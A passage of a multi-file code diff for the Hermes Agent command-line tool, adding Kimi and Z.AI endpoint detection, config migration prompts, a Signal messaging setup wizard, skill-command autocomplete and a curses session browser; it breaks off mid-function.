f.write(json.dumps(msg, ensure_ascii=False) + "\n")
@@ -641,7 +730,7 @@ class SessionStore:
return []
messages = []
with open(transcript_path, "r") as f:
with open(transcript_path, "r", encoding="utf-8") as f:
for line in f:
line = line.strip()
if line:

View File

@@ -138,6 +138,83 @@ PROVIDER_REGISTRY: Dict[str, ProviderConfig] = {
}
# =============================================================================
# Kimi Code Endpoint Detection
# =============================================================================
# Kimi Code (platform.kimi.ai) issues keys prefixed "sk-kimi-" that only work
# on api.kimi.com/coding/v1. Legacy keys from platform.moonshot.ai work on
# api.moonshot.ai/v1 (the default). Auto-detect when user hasn't set
# KIMI_BASE_URL explicitly.
KIMI_CODE_BASE_URL = "https://api.kimi.com/coding/v1"
def _resolve_kimi_base_url(api_key: str, default_url: str, env_override: str) -> str:
"""Return the correct Kimi base URL based on the API key prefix.
If the user has explicitly set KIMI_BASE_URL, that always wins.
Otherwise, sk-kimi- prefixed keys route to api.kimi.com/coding/v1.
"""
if env_override:
return env_override
if api_key.startswith("sk-kimi-"):
return KIMI_CODE_BASE_URL
return default_url
# =============================================================================
# Z.AI Endpoint Detection
# =============================================================================
# Z.AI has separate billing for general vs coding plans, and global vs China
# endpoints. A key that works on one may return "Insufficient balance" on
# another. We probe at setup time and store the working endpoint.
ZAI_ENDPOINTS = [
# (id, base_url, default_model, label)
("global", "https://api.z.ai/api/paas/v4", "glm-5", "Global"),
("cn", "https://open.bigmodel.cn/api/paas/v4", "glm-5", "China"),
("coding-global", "https://api.z.ai/api/coding/paas/v4", "glm-4.7", "Global (Coding Plan)"),
("coding-cn", "https://open.bigmodel.cn/api/coding/paas/v4", "glm-4.7", "China (Coding Plan)"),
]
def detect_zai_endpoint(api_key: str, timeout: float = 8.0) -> Optional[Dict[str, str]]:
"""Probe z.ai endpoints to find one that accepts this API key.
Returns {"id": ..., "base_url": ..., "model": ..., "label": ...} for the
first working endpoint, or None if all fail.
"""
for ep_id, base_url, model, label in ZAI_ENDPOINTS:
try:
resp = httpx.post(
f"{base_url}/chat/completions",
headers={
"Authorization": f"Bearer {api_key}",
"Content-Type": "application/json",
},
json={
"model": model,
"stream": False,
"max_tokens": 1,
"messages": [{"role": "user", "content": "ping"}],
},
timeout=timeout,
)
if resp.status_code == 200:
logger.debug("Z.AI endpoint probe: %s (%s) OK", ep_id, base_url)
return {
"id": ep_id,
"base_url": base_url,
"model": model,
"label": label,
}
logger.debug("Z.AI endpoint probe: %s returned %s", ep_id, resp.status_code)
except Exception as exc:
logger.debug("Z.AI endpoint probe: %s failed: %s", ep_id, exc)
return None
# =============================================================================
# Error Types
# =============================================================================
@@ -1298,11 +1375,16 @@ def get_api_key_provider_status(provider_id: str) -> Dict[str, Any]:
key_source = env_var
break
base_url = pconfig.inference_base_url
env_url = ""
if pconfig.base_url_env_var:
env_url = os.getenv(pconfig.base_url_env_var, "").strip()
if env_url:
base_url = env_url
if provider_id == "kimi-coding":
base_url = _resolve_kimi_base_url(api_key, pconfig.inference_base_url, env_url)
elif env_url:
base_url = env_url
else:
base_url = pconfig.inference_base_url
return {
"configured": bool(api_key),
@@ -1350,11 +1432,16 @@ def resolve_api_key_provider_credentials(provider_id: str) -> Dict[str, Any]:
key_source = env_var
break
base_url = pconfig.inference_base_url
env_url = ""
if pconfig.base_url_env_var:
env_url = os.getenv(pconfig.base_url_env_var, "").strip()
if env_url:
base_url = env_url.rstrip("/")
if provider_id == "kimi-coding":
base_url = _resolve_kimi_base_url(api_key, pconfig.inference_base_url, env_url)
elif env_url:
base_url = env_url.rstrip("/")
else:
base_url = pconfig.inference_base_url
return {
"provider": provider_id,

View File

@@ -285,8 +285,8 @@ def _convert_to_png(path: Path) -> bool:
logger.debug("Pillow BMP→PNG conversion failed: %s", e)
# Fall back to ImageMagick convert
tmp = path.with_suffix(".bmp")
try:
tmp = path.with_suffix(".bmp")
path.rename(tmp)
r = subprocess.run(
["convert", str(tmp), "png:" + str(path)],
@@ -297,8 +297,12 @@ def _convert_to_png(path: Path) -> bool:
return True
except FileNotFoundError:
logger.debug("ImageMagick not installed — cannot convert BMP to PNG")
if tmp.exists() and not path.exists():
tmp.rename(path)
except Exception as e:
logger.debug("ImageMagick BMP→PNG conversion failed: %s", e)
if tmp.exists() and not path.exists():
tmp.rename(path)
# Can't convert — BMP is still usable as-is for most APIs
return path.exists() and path.stat().st_size > 0

View File

@@ -94,8 +94,6 @@ def _read_cache_models(codex_home: Path) -> List[str]:
if not isinstance(slug, str) or not slug.strip():
continue
slug = slug.strip()
if "codex" not in slug.lower():
continue
if item.get("supported_in_api") is False:
continue
visibility = item.get("visibility")

View File

@@ -1,9 +1,15 @@
"""Slash command definitions and autocomplete for the Hermes CLI.
Contains the COMMANDS dict and the SlashCommandCompleter class.
These are pure data/UI with no HermesCLI state dependency.
Contains the shared built-in ``COMMANDS`` dict and ``SlashCommandCompleter``.
The completer can optionally include dynamic skill slash commands supplied by the
interactive CLI.
"""
from __future__ import annotations
from collections.abc import Callable, Mapping
from typing import Any
from prompt_toolkit.completion import Completer, Completion
@@ -12,6 +18,7 @@ COMMANDS = {
"/tools": "List available tools",
"/toolsets": "List available toolsets",
"/model": "Show or change the current model",
"/provider": "Show available providers and current provider",
"/prompt": "View/set custom system prompt",
"/personality": "Set a predefined personality",
"/clear": "Clear screen and reset conversation (fresh start)",
@@ -27,26 +34,68 @@ COMMANDS = {
"/platforms": "Show gateway/messaging platform status",
"/verbose": "Cycle tool progress display: off → new → all → verbose",
"/compress": "Manually compress conversation context (flush memories + summarize)",
"/title": "Set a title for the current session (usage: /title My Session Name)",
"/usage": "Show token usage for the current session",
"/insights": "Show usage insights and analytics (last 30 days)",
"/paste": "Check clipboard for an image and attach it",
"/reload-mcp": "Reload MCP servers from config.yaml",
"/quit": "Exit the CLI (also: /exit, /q)",
}
class SlashCommandCompleter(Completer):
"""Autocomplete for /commands in the input area."""
"""Autocomplete for built-in slash commands and optional skill commands."""
def __init__(
self,
skill_commands_provider: Callable[[], Mapping[str, dict[str, Any]]] | None = None,
) -> None:
self._skill_commands_provider = skill_commands_provider
def _iter_skill_commands(self) -> Mapping[str, dict[str, Any]]:
if self._skill_commands_provider is None:
return {}
try:
return self._skill_commands_provider() or {}
except Exception:
return {}
@staticmethod
def _completion_text(cmd_name: str, word: str) -> str:
"""Return replacement text for a completion.
When the user has already typed the full command exactly (``/help``),
returning ``help`` would be a no-op and prompt_toolkit suppresses the
menu. Appending a trailing space keeps the dropdown visible and makes
backspacing retrigger it naturally.
"""
return f"{cmd_name} " if cmd_name == word else cmd_name
def get_completions(self, document, complete_event):
text = document.text_before_cursor
if not text.startswith("/"):
return
word = text[1:]
for cmd, desc in COMMANDS.items():
cmd_name = cmd[1:]
if cmd_name.startswith(word):
yield Completion(
cmd_name,
self._completion_text(cmd_name, word),
start_position=-len(word),
display=cmd,
display_meta=desc,
)
for cmd, info in self._iter_skill_commands().items():
cmd_name = cmd[1:]
if cmd_name.startswith(word):
description = str(info.get("description", "Skill command"))
short_desc = description[:50] + ("..." if len(description) > 50 else "")
yield Completion(
self._completion_text(cmd_name, word),
start_position=-len(word),
display=cmd,
display_meta=f"{short_desc}",
)

View File

@@ -81,17 +81,34 @@ DEFAULT_CONFIG = {
"browser": {
"inactivity_timeout": 120,
"record_sessions": False, # Auto-record browser sessions as WebM videos
},
"compression": {
"enabled": True,
"threshold": 0.85,
"summary_model": "google/gemini-3-flash-preview",
"summary_provider": "auto",
},
# Auxiliary model overrides (advanced). By default Hermes auto-selects
# the provider and model for each side task. Set these to override.
"auxiliary": {
"vision": {
"provider": "auto", # auto | openrouter | nous | main
"model": "", # e.g. "google/gemini-2.5-flash", "gpt-4o"
},
"web_extract": {
"provider": "auto",
"model": "",
},
},
"display": {
"compact": False,
"personality": "kawaii",
"resume_display": "full", # "full" (show previous messages) | "minimal" (one-liner only)
"bell_on_complete": False, # Play terminal bell (\a) when agent finishes a response
},
# Text-to-speech configuration
@@ -156,6 +173,15 @@ DEFAULT_CONFIG = {
# Config Migration System
# =============================================================================
# Track which env vars were introduced in each config version.
# Migration only mentions vars new since the user's previous version.
ENV_VARS_BY_VERSION: Dict[int, List[str]] = {
3: ["FIRECRAWL_API_KEY", "BROWSERBASE_API_KEY", "BROWSERBASE_PROJECT_ID", "FAL_KEY"],
4: ["VOICE_TOOLS_OPENAI_KEY", "ELEVENLABS_API_KEY"],
5: ["WHATSAPP_ENABLED", "WHATSAPP_MODE", "WHATSAPP_ALLOWED_USERS",
"SLACK_BOT_TOKEN", "SLACK_APP_TOKEN", "SLACK_ALLOWED_USERS"],
}
# Required environment variables with metadata for migration prompts.
# LLM provider is required but handled in the setup wizard's provider
# selection step (Nous Portal / OpenRouter / Custom endpoint), so this
@@ -413,7 +439,7 @@ OPTIONAL_ENV_VARS = {
"category": "setting",
},
"HERMES_MAX_ITERATIONS": {
"description": "Maximum tool-calling iterations per conversation (default: 60)",
"description": "Maximum tool-calling iterations per conversation (default: 90)",
"prompt": "Max iterations",
"url": None,
"password": False,
@@ -625,34 +651,47 @@ def migrate_config(interactive: bool = True, quiet: bool = False) -> Dict[str, A
if v["name"] not in required_names and not v.get("advanced")
]
if interactive and missing_optional:
print(" Would you like to configure any optional keys now?")
try:
answer = input(" Configure optional keys? [y/N]: ").strip().lower()
except (EOFError, KeyboardInterrupt):
answer = "n"
if answer in ("y", "yes"):
# Only offer to configure env vars that are NEW since the user's previous version
new_var_names = set()
for ver in range(current_ver + 1, latest_ver + 1):
new_var_names.update(ENV_VARS_BY_VERSION.get(ver, []))
if new_var_names and interactive and not quiet:
new_and_unset = [
(name, OPTIONAL_ENV_VARS[name])
for name in sorted(new_var_names)
if not get_env_value(name) and name in OPTIONAL_ENV_VARS
]
if new_and_unset:
print(f"\n {len(new_and_unset)} new optional key(s) in this update:")
for name, info in new_and_unset:
print(f"{name}{info.get('description', '')}")
print()
for var in missing_optional:
desc = var.get("description", "")
if var.get("url"):
print(f" {desc}")
print(f" Get your key at: {var['url']}")
else:
print(f" {desc}")
if var.get("password"):
import getpass
value = getpass.getpass(f" {var['prompt']} (Enter to skip): ")
else:
value = input(f" {var['prompt']} (Enter to skip): ").strip()
if value:
save_env_value(var["name"], value)
results["env_added"].append(var["name"])
print(f" ✓ Saved {var['name']}")
try:
answer = input(" Configure new keys? [y/N]: ").strip().lower()
except (EOFError, KeyboardInterrupt):
answer = "n"
if answer in ("y", "yes"):
print()
for name, info in new_and_unset:
if info.get("url"):
print(f" {info.get('description', name)}")
print(f" Get your key at: {info['url']}")
else:
print(f" {info.get('description', name)}")
if info.get("password"):
import getpass
value = getpass.getpass(f" {info.get('prompt', name)} (Enter to skip): ")
else:
value = input(f" {info.get('prompt', name)} (Enter to skip): ").strip()
if value:
save_env_value(name, value)
results["env_added"].append(name)
print(f" ✓ Saved {name}")
print()
else:
print(" Set later with: hermes config set KEY VALUE")
# Check for missing config fields
missing_config = get_missing_config_fields()
@@ -720,6 +759,36 @@ def load_config() -> Dict[str, Any]:
return config
_COMMENTED_SECTIONS = """
# ── Security ──────────────────────────────────────────────────────────
# API keys, tokens, and passwords are redacted from tool output by default.
# Set to false to see full values (useful for debugging auth issues).
#
# security:
# redact_secrets: false
# ── Fallback Model ────────────────────────────────────────────────────
# Automatic provider failover when primary is unavailable.
# Uncomment and configure to enable. Triggers on rate limits (429),
# overload (529), service errors (503), or connection failures.
#
# Supported providers:
# openrouter (OPENROUTER_API_KEY) — routes to any model
# openai-codex (OAuth — hermes login) — OpenAI Codex
# nous (OAuth — hermes login) — Nous Portal
# zai (ZAI_API_KEY) — Z.AI / GLM
# kimi-coding (KIMI_API_KEY) — Kimi / Moonshot
# minimax (MINIMAX_API_KEY) — MiniMax
# minimax-cn (MINIMAX_CN_API_KEY) — MiniMax (China)
#
# For custom OpenAI-compatible endpoints, add base_url and api_key_env.
#
# fallback_model:
# provider: openrouter
# model: anthropic/claude-sonnet-4
"""
def save_config(config: Dict[str, Any]):
"""Save configuration to ~/.hermes/config.yaml."""
ensure_hermes_home()
@@ -727,6 +796,18 @@ def save_config(config: Dict[str, Any]):
with open(config_path, 'w') as f:
yaml.dump(config, f, default_flow_style=False, sort_keys=False)
# Append commented-out sections for features that are off by default
# or only relevant when explicitly configured. Skip sections the
# user has already uncommented and configured.
sections = []
sec = config.get("security", {})
if not sec or sec.get("redact_secrets") is None:
sections.append("security")
fb = config.get("fallback_model", {})
if not fb or not (fb.get("provider") and fb.get("model")):
sections.append("fallback")
if sections:
f.write(_COMMENTED_SECTIONS)
def load_env() -> Dict[str, str]:
@@ -890,6 +971,31 @@ def show_config():
if enabled:
print(f" Threshold: {compression.get('threshold', 0.85) * 100:.0f}%")
print(f" Model: {compression.get('summary_model', 'google/gemini-3-flash-preview')}")
comp_provider = compression.get('summary_provider', 'auto')
if comp_provider != 'auto':
print(f" Provider: {comp_provider}")
# Auxiliary models
auxiliary = config.get('auxiliary', {})
aux_tasks = {
"Vision": auxiliary.get('vision', {}),
"Web extract": auxiliary.get('web_extract', {}),
}
has_overrides = any(
t.get('provider', 'auto') != 'auto' or t.get('model', '')
for t in aux_tasks.values()
)
if has_overrides:
print()
print(color("◆ Auxiliary Models (overrides)", Colors.CYAN, Colors.BOLD))
for label, task_cfg in aux_tasks.items():
prov = task_cfg.get('provider', 'auto')
mdl = task_cfg.get('model', '')
if prov != 'auto' or mdl:
parts = [f"provider={prov}"]
if mdl:
parts.append(f"model={mdl}")
print(f" {label:12s} {', '.join(parts)}")
# Messaging
print()
@@ -947,7 +1053,7 @@ def set_config_value(key: str, value: str):
'FAL_KEY', 'TELEGRAM_BOT_TOKEN', 'DISCORD_BOT_TOKEN',
'TERMINAL_SSH_HOST', 'TERMINAL_SSH_USER', 'TERMINAL_SSH_KEY',
'SUDO_PASSWORD', 'SLACK_BOT_TOKEN', 'SLACK_APP_TOKEN',
'GITHUB_TOKEN', 'HONCHO_API_KEY', 'NOUS_API_KEY', 'WANDB_API_KEY',
'GITHUB_TOKEN', 'HONCHO_API_KEY', 'WANDB_API_KEY',
'TINKER_API_KEY',
]
@@ -1004,6 +1110,7 @@ def set_config_value(key: str, value: str):
"terminal.daytona_image": "TERMINAL_DAYTONA_IMAGE",
"terminal.cwd": "TERMINAL_CWD",
"terminal.timeout": "TERMINAL_TIMEOUT",
"terminal.sandbox_dir": "TERMINAL_SANDBOX_DIR",
}
if key in _config_to_env_sync:
save_env_value(_config_to_env_sync[key], str(value))

View File

@@ -33,6 +33,26 @@ os.environ.setdefault("MSWEA_SILENT_STARTUP", "1")
from hermes_cli.colors import Colors, color
from hermes_constants import OPENROUTER_MODELS_URL
_PROVIDER_ENV_HINTS = (
"OPENROUTER_API_KEY",
"OPENAI_API_KEY",
"ANTHROPIC_API_KEY",
"OPENAI_BASE_URL",
"GLM_API_KEY",
"ZAI_API_KEY",
"Z_AI_API_KEY",
"KIMI_API_KEY",
"MINIMAX_API_KEY",
"MINIMAX_CN_API_KEY",
)
def _has_provider_env_config(content: str) -> bool:
"""Return True when ~/.hermes/.env contains provider auth/base URL settings."""
return any(key in content for key in _PROVIDER_ENV_HINTS)
def check_ok(text: str, detail: str = ""):
print(f" {color('', Colors.GREEN)} {text}" + (f" {color(detail, Colors.DIM)}" if detail else ""))
@@ -132,12 +152,8 @@ def run_doctor(args):
# Check for common issues
content = env_path.read_text()
if any(k in content for k in (
"OPENROUTER_API_KEY", "ANTHROPIC_API_KEY",
"GLM_API_KEY", "ZAI_API_KEY", "Z_AI_API_KEY",
"KIMI_API_KEY", "MINIMAX_API_KEY", "MINIMAX_CN_API_KEY",
)):
check_ok("API key configured")
if _has_provider_env_config(content):
check_ok("API key or custom endpoint configured")
else:
check_warn("No API key found in ~/.hermes/.env")
issues.append("Run 'hermes setup' to configure API keys")
@@ -492,10 +508,16 @@ def run_doctor(args):
try:
import httpx
_base = os.getenv(_base_env, "")
# Auto-detect Kimi Code keys (sk-kimi-) → api.kimi.com
if not _base and _key.startswith("sk-kimi-"):
_base = "https://api.kimi.com/coding/v1"
_url = (_base.rstrip("/") + "/models") if _base else _default_url
_headers = {"Authorization": f"Bearer {_key}"}
if "api.kimi.com" in _url.lower():
_headers["User-Agent"] = "KimiCLI/1.0"
_resp = httpx.get(
_url,
headers={"Authorization": f"Bearer {_key}"},
headers=_headers,
timeout=10,
)
if _resp.status_code == 200:

View File

@@ -154,19 +154,33 @@ def get_hermes_cli_path() -> str:
# =============================================================================
def generate_systemd_unit() -> str:
import shutil
python_path = get_python_path()
working_dir = str(PROJECT_ROOT)
venv_dir = str(PROJECT_ROOT / "venv")
venv_bin = str(PROJECT_ROOT / "venv" / "bin")
node_bin = str(PROJECT_ROOT / "node_modules" / ".bin")
# Build a PATH that includes the venv, node_modules, and standard system dirs
sane_path = f"{venv_bin}:{node_bin}:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
hermes_cli = shutil.which("hermes") or f"{python_path} -m hermes_cli.main"
return f"""[Unit]
Description={SERVICE_DESCRIPTION}
After=network.target
[Service]
Type=simple
ExecStart={python_path} -m hermes_cli.main gateway run
ExecStart={python_path} -m hermes_cli.main gateway run --replace
ExecStop={hermes_cli} gateway stop
WorkingDirectory={working_dir}
Environment="PATH={sane_path}"
Environment="VIRTUAL_ENV={venv_dir}"
Restart=on-failure
RestartSec=10
KillMode=mixed
KillSignal=SIGTERM
TimeoutStopSec=15
StandardOutput=journal
StandardError=journal
@@ -377,8 +391,15 @@ def launchd_status(deep: bool = False):
# Gateway Runner
# =============================================================================
def run_gateway(verbose: bool = False):
"""Run the gateway in foreground."""
def run_gateway(verbose: bool = False, replace: bool = False):
"""Run the gateway in foreground.
Args:
verbose: Enable verbose logging output.
replace: If True, kill any existing gateway instance before starting.
This prevents systemd restart loops when the old process
hasn't fully exited yet.
"""
sys.path.insert(0, str(PROJECT_ROOT))
from gateway.run import start_gateway
@@ -393,7 +414,7 @@ def run_gateway(verbose: bool = False):
# Exit with code 1 if gateway fails to connect any platform,
# so systemd Restart=on-failure will retry on transient errors
success = asyncio.run(start_gateway())
success = asyncio.run(start_gateway(replace=replace))
if not success:
sys.exit(1)
@@ -486,6 +507,12 @@ _PLATFORMS = [
"emoji": "📲",
"token_var": "WHATSAPP_ENABLED",
},
{
"key": "signal",
"label": "Signal",
"emoji": "📡",
"token_var": "SIGNAL_HTTP_URL",
},
]
@@ -504,6 +531,13 @@ def _platform_status(platform: dict) -> str:
return "configured + paired"
return "enabled, not paired"
return "not configured"
if platform.get("key") == "signal":
account = get_env_value("SIGNAL_ACCOUNT")
if val and account:
return "configured"
if val or account:
return "partially configured"
return "not configured"
if val:
return "configured"
return "not configured"
@@ -629,6 +663,121 @@ def _is_service_running() -> bool:
return len(find_gateway_pids()) > 0
def _setup_signal():
"""Interactive setup for Signal messenger."""
import shutil
print()
print(color(" ─── 📡 Signal Setup ───", Colors.CYAN))
existing_url = get_env_value("SIGNAL_HTTP_URL")
existing_account = get_env_value("SIGNAL_ACCOUNT")
if existing_url and existing_account:
print()
print_success("Signal is already configured.")
if not prompt_yes_no(" Reconfigure Signal?", False):
return
# Check if signal-cli is available
print()
if shutil.which("signal-cli"):
print_success("signal-cli found on PATH.")
else:
print_warning("signal-cli not found on PATH.")
print_info(" Signal requires signal-cli running as an HTTP daemon.")
print_info(" Install options:")
print_info(" Linux: sudo apt install signal-cli")
print_info(" or download from https://github.com/AsamK/signal-cli")
print_info(" macOS: brew install signal-cli")
print_info(" Docker: bbernhard/signal-cli-rest-api")
print()
print_info(" After installing, link your account and start the daemon:")
print_info(" signal-cli link -n \"HermesAgent\"")
print_info(" signal-cli --account +YOURNUMBER daemon --http 127.0.0.1:8080")
print()
# HTTP URL
print()
print_info(" Enter the URL where signal-cli HTTP daemon is running.")
default_url = existing_url or "http://127.0.0.1:8080"
try:
url = input(f" HTTP URL [{default_url}]: ").strip() or default_url
except (EOFError, KeyboardInterrupt):
print("\n Setup cancelled.")
return
# Test connectivity
print_info(" Testing connection...")
try:
import httpx
resp = httpx.get(f"{url.rstrip('/')}/api/v1/check", timeout=10.0)
if resp.status_code == 200:
print_success(" signal-cli daemon is reachable!")
else:
print_warning(f" signal-cli responded with status {resp.status_code}.")
if not prompt_yes_no(" Continue anyway?", False):
return
except Exception as e:
print_warning(f" Could not reach signal-cli at {url}: {e}")
if not prompt_yes_no(" Save this URL anyway? (you can start signal-cli later)", True):
return
save_env_value("SIGNAL_HTTP_URL", url)
# Account phone number
print()
print_info(" Enter your Signal account phone number in E.164 format.")
print_info(" Example: +15551234567")
default_account = existing_account or ""
try:
account = input(f" Account number{f' [{default_account}]' if default_account else ''}: ").strip()
if not account:
account = default_account
except (EOFError, KeyboardInterrupt):
print("\n Setup cancelled.")
return
if not account:
print_error(" Account number is required.")
return
save_env_value("SIGNAL_ACCOUNT", account)
# Allowed users
print()
print_info(" The gateway DENIES all users by default for security.")
print_info(" Enter phone numbers or UUIDs of allowed users (comma-separated).")
existing_allowed = get_env_value("SIGNAL_ALLOWED_USERS") or ""
default_allowed = existing_allowed or account
try:
allowed = input(f" Allowed users [{default_allowed}]: ").strip() or default_allowed
except (EOFError, KeyboardInterrupt):
print("\n Setup cancelled.")
return
save_env_value("SIGNAL_ALLOWED_USERS", allowed)
# Group messaging
print()
if prompt_yes_no(" Enable group messaging? (disabled by default for security)", False):
print()
print_info(" Enter group IDs to allow, or * for all groups.")
existing_groups = get_env_value("SIGNAL_GROUP_ALLOWED_USERS") or ""
try:
groups = input(f" Group IDs [{existing_groups or '*'}]: ").strip() or existing_groups or "*"
except (EOFError, KeyboardInterrupt):
print("\n Setup cancelled.")
return
save_env_value("SIGNAL_GROUP_ALLOWED_USERS", groups)
print()
print_success("Signal configured!")
print_info(f" URL: {url}")
print_info(f" Account: {account}")
print_info(f" DM auth: via SIGNAL_ALLOWED_USERS + DM pairing")
print_info(f" Groups: {'enabled' if get_env_value('SIGNAL_GROUP_ALLOWED_USERS') else 'disabled'}")
def gateway_setup():
"""Interactive setup for messaging platforms + gateway service."""
@@ -681,6 +830,8 @@ def gateway_setup():
if platform["key"] == "whatsapp":
_setup_whatsapp()
elif platform["key"] == "signal":
_setup_signal()
else:
_setup_standard_platform(platform)
@@ -765,7 +916,8 @@ def gateway_command(args):
# Default to run if no subcommand
if subcmd is None or subcmd == "run":
verbose = getattr(args, 'verbose', False)
run_gateway(verbose)
replace = getattr(args, 'replace', False)
run_gateway(verbose, replace=replace)
return
if subcmd == "setup":

View File

@@ -21,6 +21,7 @@ Usage:
hermes version # Show version
hermes update # Update to latest version
hermes uninstall # Uninstall Hermes Agent
hermes sessions browse # Interactive session picker with search
"""
import argparse
@@ -106,6 +107,279 @@ def _has_any_provider_configured() -> bool:
return False
def _session_browse_picker(sessions: list) -> Optional[str]:
"""Interactive curses-based session browser with live search filtering.
Returns the selected session ID, or None if cancelled.
Uses curses (not simple_term_menu) to avoid the ghost-duplication rendering
bug in tmux/iTerm when arrow keys are used.
"""
if not sessions:
print("No sessions found.")
return None
# Try curses-based picker first
try:
import curses
import time as _time
from datetime import datetime
result_holder = [None]
def _relative_time(ts):
if not ts:
return "?"
delta = _time.time() - ts
if delta < 60:
return "just now"
elif delta < 3600:
return f"{int(delta / 60)}m ago"
elif delta < 86400:
return f"{int(delta / 3600)}h ago"
elif delta < 172800:
return "yesterday"
elif delta < 604800:
return f"{int(delta / 86400)}d ago"
else:
return datetime.fromtimestamp(ts).strftime("%Y-%m-%d")
def _format_row(s, max_x):
"""Format a session row for display."""
title = (s.get("title") or "").strip()
preview = (s.get("preview") or "").strip()
source = s.get("source", "")[:6]
last_active = _relative_time(s.get("last_active"))
sid = s["id"][:18]
# Adaptive column widths based on terminal width
# Layout: [arrow 3] [title/preview flexible] [active 12] [src 6] [id 18]
fixed_cols = 3 + 12 + 6 + 18 + 6 # arrow + active + src + id + padding
name_width = max(20, max_x - fixed_cols)
if title:
name = title[:name_width]
elif preview:
name = preview[:name_width]
else:
name = sid
return f"{name:<{name_width}} {last_active:<10} {source:<5} {sid}"
def _match(s, query):
"""Check if a session matches the search query (case-insensitive)."""
q = query.lower()
return (
q in (s.get("title") or "").lower()
or q in (s.get("preview") or "").lower()
or q in s.get("id", "").lower()
or q in (s.get("source") or "").lower()
)
def _curses_browse(stdscr):
curses.curs_set(0)
if curses.has_colors():
curses.start_color()
curses.use_default_colors()
curses.init_pair(1, curses.COLOR_GREEN, -1) # selected
curses.init_pair(2, curses.COLOR_YELLOW, -1) # header
curses.init_pair(3, curses.COLOR_CYAN, -1) # search
curses.init_pair(4, 8, -1) # dim
cursor = 0
scroll_offset = 0
search_text = ""
filtered = list(sessions)
while True:
stdscr.clear()
max_y, max_x = stdscr.getmaxyx()
if max_y < 5 or max_x < 40:
# Terminal too small
try:
stdscr.addstr(0, 0, "Terminal too small")
except curses.error:
pass
stdscr.refresh()
stdscr.getch()
return
# Header line
if search_text:
header = f" Browse sessions — filter: {search_text}"
header_attr = curses.A_BOLD
if curses.has_colors():
header_attr |= curses.color_pair(3)
else:
header = " Browse sessions — ↑↓ navigate Enter select Type to filter Esc quit"
header_attr = curses.A_BOLD
if curses.has_colors():
header_attr |= curses.color_pair(2)
try:
stdscr.addnstr(0, 0, header, max_x - 1, header_attr)
except curses.error:
pass
# Column header line
fixed_cols = 3 + 12 + 6 + 18 + 6
name_width = max(20, max_x - fixed_cols)
col_header = f" {'Title / Preview':<{name_width}} {'Active':<10} {'Src':<5} {'ID'}"
try:
dim_attr = curses.color_pair(4) if curses.has_colors() else curses.A_DIM
stdscr.addnstr(1, 0, col_header, max_x - 1, dim_attr)
except curses.error:
pass
# Compute visible area
visible_rows = max_y - 4 # header + col header + blank + footer
if visible_rows < 1:
visible_rows = 1
# Clamp cursor and scroll
if not filtered:
try:
msg = " No sessions match the filter."
stdscr.addnstr(3, 0, msg, max_x - 1, curses.A_DIM)
except curses.error:
pass
else:
if cursor >= len(filtered):
cursor = len(filtered) - 1
if cursor < 0:
cursor = 0
if cursor < scroll_offset:
scroll_offset = cursor
elif cursor >= scroll_offset + visible_rows:
scroll_offset = cursor - visible_rows + 1
for draw_i, i in enumerate(range(
scroll_offset,
min(len(filtered), scroll_offset + visible_rows)
)):
y = draw_i + 3
if y >= max_y - 1:
break
s = filtered[i]
arrow = "" if i == cursor else " "
row = arrow + _format_row(s, max_x - 3)
attr = curses.A_NORMAL
if i == cursor:
attr = curses.A_BOLD
if curses.has_colors():
attr |= curses.color_pair(1)
try:
stdscr.addnstr(y, 0, row, max_x - 1, attr)
except curses.error:
pass
# Footer
footer_y = max_y - 1
if filtered:
footer = f" {cursor + 1}/{len(filtered)} sessions"
if len(filtered) < len(sessions):
footer += f" (filtered from {len(sessions)})"
else:
footer = f" 0/{len(sessions)} sessions"
try:
stdscr.addnstr(footer_y, 0, footer, max_x - 1,
curses.color_pair(4) if curses.has_colors() else curses.A_DIM)
except curses.error:
pass
stdscr.refresh()
key = stdscr.getch()
if key in (curses.KEY_UP, ):
if filtered:
cursor = (cursor - 1) % len(filtered)
elif key in (curses.KEY_DOWN, ):
if filtered:
cursor = (cursor + 1) % len(filtered)
elif key in (curses.KEY_ENTER, 10, 13):
if filtered:
result_holder[0] = filtered[cursor]["id"]
return
elif key == 27: # Esc
if search_text:
# First Esc clears the search
search_text = ""
filtered = list(sessions)
cursor = 0
scroll_offset = 0
else:
# Second Esc exits
return
elif key in (curses.KEY_BACKSPACE, 127, 8):
if search_text:
search_text = search_text[:-1]
if search_text:
filtered = [s for s in sessions if _match(s, search_text)]
else:
filtered = list(sessions)
cursor = 0
scroll_offset = 0
elif key == ord('q') and not search_text:
return
elif 32 <= key <= 126:
# Printable character → add to search filter
search_text += chr(key)
filtered = [s for s in sessions if _match(s, search_text)]
cursor = 0
scroll_offset = 0
curses.wrapper(_curses_browse)
return result_holder[0]
except Exception:
pass
# Fallback: numbered list (Windows without curses, etc.)
import time as _time
from datetime import datetime
def _relative_time_fb(ts):
if not ts:
return "?"
delta = _time.time() - ts
if delta < 60:
return "just now"
elif delta < 3600:
return f"{int(delta / 60)}m ago"
elif delta < 86400:
return f"{int(delta / 3600)}h ago"
elif delta < 172800:
return "yesterday"
elif delta < 604800:
return f"{int(delta / 86400)}d ago"
else:
return datetime.fromtimestamp(ts).strftime("%Y-%m-%d")
print("\n Browse sessions (enter number to resume, q to cancel)\n")
for i, s in enumerate(sessions):
title = (s.get("title") or "").strip()
preview = (s.get("preview") or "").strip()
label = title or preview or s["id"]
if len(label) > 50:
label = label[:47] + "..."
last_active = _relative_time_fb(s.get("last_active"))
src = s.get("source", "")[:6]
print(f" {i + 1:>3}. {label:<50} {last_active:<10} {src}")
while True:
try:
val = input(f"\n Select [1-{len(sessions)}]: ").strip()
if not val or val.lower() in ("q", "quit", "exit"):
return None
idx = int(val) - 1
if 0 <= idx < len(sessions):
return sessions[idx]["id"]
print(f" Invalid selection. Enter 1-{len(sessions)} or q to cancel.")
except ValueError:
print(f" Invalid input. Enter a number or q to cancel.")
except (KeyboardInterrupt, EOFError):
print()
return None
def _resolve_last_cli_session() -> Optional[str]:
"""Look up the most recent CLI session ID from SQLite. Returns None if unavailable."""
try:
@@ -120,16 +394,63 @@ def _resolve_last_cli_session() -> Optional[str]:
return None
def _resolve_session_by_name_or_id(name_or_id: str) -> Optional[str]:
"""Resolve a session name (title) or ID to a session ID.
- If it looks like a session ID (contains underscore + hex), try direct lookup first.
- Otherwise, treat it as a title and use resolve_session_by_title (auto-latest).
- Falls back to the other method if the first doesn't match.
"""
try:
from hermes_state import SessionDB
db = SessionDB()
# Try as exact session ID first
session = db.get_session(name_or_id)
if session:
db.close()
return session["id"]
# Try as title (with auto-latest for lineage)
